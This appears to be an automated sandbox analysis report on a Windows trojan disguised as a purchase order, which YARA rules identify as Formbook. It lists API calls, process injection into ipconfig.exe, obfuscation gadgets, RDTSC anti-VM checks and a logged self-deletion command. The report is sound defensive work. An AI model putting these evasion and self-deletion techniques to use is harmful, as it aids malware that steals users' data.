Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9760 NtOpenProcess, 1_2_00FC9760
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9730 NtQueryVirtualMemory, 1_2_00FC9730
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FCA710 NtOpenProcessToken, 1_2_00FCA710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9A50 NtCreateFile,LdrInitializeThunk, 5_2_02EB9A50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_02EB9860
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9840 NtDelayExecution,LdrInitializeThunk, 5_2_02EB9840
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB99A0 NtCreateSection,LdrInitializeThunk, 5_2_02EB99A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_02EB9910
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB96E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_02EB96E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB96D0 NtCreateKey,LdrInitializeThunk, 5_2_02EB96D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9FE0 NtCreateMutant,LdrInitializeThunk, 5_2_02EB9FE0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9780 NtMapViewOfSection,LdrInitializeThunk, 5_2_02EB9780
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9710 NtQueryInformationToken,LdrInitializeThunk, 5_2_02EB9710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB95D0 NtClose,LdrInitializeThunk, 5_2_02EB95D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9540 NtReadFile,LdrInitializeThunk, 5_2_02EB9540
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9A80 NtOpenDirectoryObject, 5_2_02EB9A80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9A20 NtResumeThread, 5_2_02EB9A20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9A00 NtProtectVirtualMemory, 5_2_02EB9A00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9A10 NtQuerySection, 5_2_02EB9A10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EBA3B0 NtGetContextThread, 5_2_02EBA3B0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9B00 NtSetValueKey, 5_2_02EB9B00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB98F0 NtReadVirtualMemory, 5_2_02EB98F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB98A0 NtWriteVirtualMemory, 5_2_02EB98A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EBB040 NtSuspendThread, 5_2_02EBB040
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9820 NtEnumerateKey, 5_2_02EB9820
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB99D0 NtCreateProcessEx, 5_2_02EB99D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9950 NtQueueApcThread, 5_2_02EB9950
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9660 NtAllocateVirtualMemory, 5_2_02EB9660
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9670 NtQueryInformationProcess, 5_2_02EB9670
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9650 NtQueryValueKey, 5_2_02EB9650
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9610 NtEnumerateValueKey, 5_2_02EB9610
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB97A0 NtUnmapViewOfSection, 5_2_02EB97A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9760 NtOpenProcess, 5_2_02EB9760
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EBA770 NtOpenThread, 5_2_02EBA770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9770 NtSetInformationFile, 5_2_02EB9770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9730 NtQueryVirtualMemory, 5_2_02EB9730
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EBA710 NtOpenProcessToken, 5_2_02EBA710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB95F0 NtQueryInformationFile, 5_2_02EB95F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9560 NtWriteFile, 5_2_02EB9560
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9520 NtWaitForSingleObject, 5_2_02EB9520
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EBAD30 NtSetContextThread, 5_2_02EBAD30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B17BA0 NtCreateFile, 5_2_02B17BA0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B17CD0 NtClose, 5_2_02B17CD0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B17C50 NtReadFile, 5_2_02B17C50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B17CCA NtClose, 5_2_02B17CCA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B17C4C NtReadFile, 5_2_02B17C4C
Detected potential crypto function
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E9969 0_2_013E9969
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E91F9 0_2_013E91F9
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E8D64 0_2_013E8D64
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E9D51 0_2_013E9D51
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E9597 0_2_013E9597
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E07F6 0_2_013E07F6
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00401030 1_2_00401030
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041C16E 1_2_0041C16E
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00408A40 1_2_00408A40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00408A3B 1_2_00408A3B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041C52F 1_2_0041C52F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00402D8A 1_2_00402D8A
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00402D90 1_2_00402D90
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041BF03 1_2_0041BF03
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00402FB0 1_2_00402FB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB20A0 1_2_00FB20A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9B090 1_2_00F9B090
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAA830 1_2_00FAA830
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01041002 1_2_01041002
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105E824 1_2_0105E824
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010520A8 1_2_010520A8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA4120 1_2_00FA4120
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010528EC 1_2_010528EC
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F8F900 1_2_00F8F900
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01052B28 1_2_01052B28
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104DBD2 1_2_0104DBD2
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010403DA 1_2_010403DA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0103FA2B 1_2_0103FA2B
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FBEBB0 1_2_00FBEBB0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010522AE 1_2_010522AE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FAAB40 1_2_00FAAB40
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01052D07 1_2_01052D07
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01051D55 1_2_01051D55
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_010525DD 1_2_010525DD
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9841F 1_2_00F9841F
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F9D5E0 1_2_00F9D5E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104D466 1_2_0104D466
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FB2581 1_2_00FB2581
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00F80D20 1_2_00F80D20
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FA6E30 1_2_00FA6E30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0105DFCE 1_2_0105DFCE
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01051FF1 1_2_01051FF1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0104D616 1_2_0104D616
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_01052EF7 1_2_01052EF7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F422AE 5_2_02F422AE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F2FA2B 5_2_02F2FA2B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3DBD2 5_2_02F3DBD2
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F303DA 5_2_02F303DA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EAEBB0 5_2_02EAEBB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E9AB40 5_2_02E9AB40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F42B28 5_2_02F42B28
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F428EC 5_2_02F428EC
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA20A0 5_2_02EA20A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F420A8 5_2_02F420A8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8B090 5_2_02E8B090
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F4E824 5_2_02F4E824
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F31002 5_2_02F31002
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E94120 5_2_02E94120
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E7F900 5_2_02E7F900
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F42EF7 5_2_02F42EF7
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E96E30 5_2_02E96E30
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3D616 5_2_02F3D616
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F41FF1 5_2_02F41FF1
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F4DFCE 5_2_02F4DFCE
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F3D466 5_2_02F3D466
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8841F 5_2_02E8841F
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E8D5E0 5_2_02E8D5E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F425DD 5_2_02F425DD
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EA2581 5_2_02EA2581
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F41D55 5_2_02F41D55
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02E70D20 5_2_02E70D20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02F42D07 5_2_02F42D07
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B08A3B 5_2_02B08A3B
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B08A40 5_2_02B08A40
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1C16E 5_2_02B1C16E
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B02FB0 5_2_02B02FB0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1BF03 5_2_02B1BF03
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B02D90 5_2_02B02D90
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B02D8A 5_2_02B02D8A
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1C52F 5_2_02B1C52F
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: String function: 013E0550 appears 47 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: String function: 013EDBFD appears 32 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: String function: 013DB9F5 appears 624 times
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: String function: 00F8B150 appears 54 times
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: String function: 02E7B150 appears 48 times
Sample file is different than original file name gathered from version info
Source: Purchase Order 40,7045$.exe, 00000000.00000003.237695476.000000000332F000.00000004.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000001.00000002.273903845.0000000000F27000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameipconfig.exej% vs Purchase Order 40,7045$.exe
Source: Purchase Order 40,7045$.exe, 00000001.00000002.274263371.000000000120F000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Purchase Order 40,7045$.exe
Yara signature match
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/0@17/13
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6540:120:WilError_01
Source: Purchase Order 40,7045$.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Purchase Order 40,7045$.exe Virustotal: Detection: 43%
Source: Purchase Order 40,7045$.exe ReversingLabs: Detection: 36%
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe File read: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: unknown Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe
Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Process created: C:\Users\user\Desktop\Purchase Order 40,7045$.exe C:\Users\user\Desktop\Purchase Order 40,7045$.exe Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Purchase Order 40,7045$.exe' Jump to behavior
Source: Purchase Order 40,7045$.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ipconfig.pdb source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
Source: Binary string: ipconfig.pdbGCTL source: Purchase Order 40,7045$.exe, 00000001.00000002.273754242.0000000000B29000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: Purchase Order 40,7045$.exe, 00000000.00000003.240059107.0000000003210000.00000004.00000001.sdmp, Purchase Order 40,7045$.exe, 00000001.00000002.274071356.000000000107F000.00000040.00000001.sdmp, ipconfig.exe, 00000005.00000002.504287883.0000000002F6F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: Purchase Order 40,7045$.exe, ipconfig.exe

Data Obfuscation:

barindex
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013D7FB0 LoadLibraryA,GetProcAddress,RpcMgmtEpEltInqBegin,VirtualProtect,EnumTimeFormatsA,__wsystem,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wscanf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,__wsystem,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf,_wprintf, 0_2_013D7FB0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013E0595 push ecx; ret 0_2_013E05A8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 0_2_013DD44F push ecx; ret 0_2_013DD462
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00415913 push edx; retf 1_2_00415915
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041AC62 push D8D19732h; iretd 1_2_0041AC69
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00414D57 push esi; retf 1_2_00414D58
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041AD65 push eax; ret 1_2_0041ADB8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00414DEA push eax; ret 1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041ADB2 push eax; ret 1_2_0041ADB8
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041ADBB push eax; ret 1_2_0041AE22
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00414E7E push eax; ret 1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0041AE1C push eax; ret 1_2_0041AE22
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00414E24 push eax; ret 1_2_00414E32
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_0040FF92 push 00000033h; iretd 1_2_0040FF98
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FDD0D1 push ecx; ret 1_2_00FDD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02ECD0D1 push ecx; ret 5_2_02ECD0E4
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B15913 push edx; retf 5_2_02B15915
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B14E24 push eax; ret 5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1AE1C push eax; ret 5_2_02B1AE22
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B14E7E push eax; ret 5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B0FF92 push 00000033h; iretd 5_2_02B0FF98
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1AC62 push D8D19732h; iretd 5_2_02B1AC69
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1ADB2 push eax; ret 5_2_02B1ADB8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1ADBB push eax; ret 5_2_02B1AE22
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B14DEA push eax; ret 5_2_02B14E32
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B1AD65 push eax; ret 5_2_02B1ADB8
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02B14D57 push esi; retf 5_2_02B14D58

Persistence and Installation Behavior:

barindex
Uses ipconfig to lookup or modify the Windows network settings
Source: unknown Process created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
Source: C:\Windows\SysWOW64\ipconfig.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe RDTSC instruction interceptor: First address: 00000000004083D4 second address: 00000000004083DA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
